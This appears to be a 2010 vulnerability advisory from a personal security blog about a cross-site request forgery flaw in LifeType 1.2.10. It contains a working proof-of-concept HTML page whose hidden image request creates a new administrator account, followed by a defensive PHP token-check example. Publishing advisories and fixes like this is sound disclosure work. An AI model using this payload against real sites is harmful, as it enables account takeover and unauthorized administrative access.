This site is soon to be deprecated by http://www.johnleitch.net

Sunday, July 11, 2010

LifeType 1.2.10 Cross-site Request Forgery

A cross-site request forgery vulnerability in LifeType 1.2.10 can be exploited to create a new administrator account.

PoC
<html>
<body>
<img src="http://localhost/lifetype-1.2.10/admin.php?userName=newadmin&userFullName=&newUserPassword=Password1&userEmail=a%40a.com&userStatus=1&blogId=1&blogName=asdfasdfs&userPermissions%5B49%5D=49&userPermissions%5B58%5D=58&userPermissions%5B52%5D=52&userPermissions%5B43%5D=43&userPermissions%5B46%5D=46&userPermissions%5B55%5D=55&userPermissions%5B39%5D=39&userPermissions%5B41%5D=41&userPermissions%5B1%5D=1&userPermissions%5B66%5D=66&userPermissions%5B65%5D=65&userPermissions%5B51%5D=51&userPermissions%5B60%5D=60&userPermissions%5B62%5D=62&userPermissions%5B54%5D=54&userPermissions%5B45%5D=45&userPermissions%5B64%5D=64&userPermissions%5B48%5D=48&userPermissions%5B57%5D=57&userPermissions%5B42%5D=42&userPermissions%5B50%5D=50&userPermissions%5B59%5D=59&userPermissions%5B61%5D=61&userPermissions%5B53%5D=53&userPermissions%5B44%5D=44&userPermissions%5B63%5D=63&userPermissions%5B47%5D=47&userPermissions%5B56%5D=56&userPermissions%5B40%5D=40&Add+User=Add&op=addUser" />
</body>
</html>
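
One way to close the hole the PoC relies on, as an added example that is not LifeType's code or the author's: state-changing operations are accepted only in a POST body that carries a per-session token. Only the `op=addUser` parameter comes from the PoC; the function names, the `csrfToken` field and the session key are assumptions.

```php
<?php
// Added example: a hypothetical CSRF guard, not LifeType's own code.
// Only the "op" parameter and its "addUser" value come from the PoC; the
// function names, "csrfToken" field and session key are assumptions. PHP 7.1+.

const STATE_CHANGING_OPS = ['addUser'];   // extend with every op that modifies data

// Create (once per session) and return the token to embed in each admin form.
function csrf_token(array &$session): string
{
    if (empty($session['csrfToken'])) {
        $session['csrfToken'] = bin2hex(random_bytes(32));
    }
    return $session['csrfToken'];
}

// Return null when the request may proceed, or a reason string when it must be rejected.
function csrf_check(string $method, array $query, array $post, array $session): ?string
{
    // Inspect "op" in both the URL and the body so neither can mask the other.
    $ops = array_filter([$query['op'] ?? null, $post['op'] ?? null], 'is_string');
    if (!array_intersect(STATE_CHANGING_OPS, $ops)) {
        return null;                       // read-only op: nothing to protect
    }
    // An <img> tag can only issue a GET with its parameters in the URL.
    if ($method !== 'POST' || isset($query['op'])) {
        return 'state-changing op must arrive in a POST body';
    }
    $sent = $post['csrfToken'] ?? '';
    $expected = $session['csrfToken'] ?? '';
    if (!is_string($sent) || $expected === '' || !hash_equals($expected, $sent)) {
        return 'missing or invalid CSRF token';
    }
    return null;
}

// Constructed demo requests: the PoC's GET, a tokenless POST, and a legitimate form post.
$session = [];
$token = csrf_token($session);
var_dump(
    csrf_check('GET', ['op' => 'addUser', 'userName' => 'newadmin'], [], $session),
    csrf_check('POST', [], ['op' => 'addUser'], $session),
    csrf_check('POST', [], ['op' => 'addUser', 'csrfToken' => $token], $session)
);
```

In a real request handler the arguments would be `$_SERVER['REQUEST_METHOD']`, `$_GET`, `$_POST` and `$_SESSION`, with the check run before the operation is dispatched.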
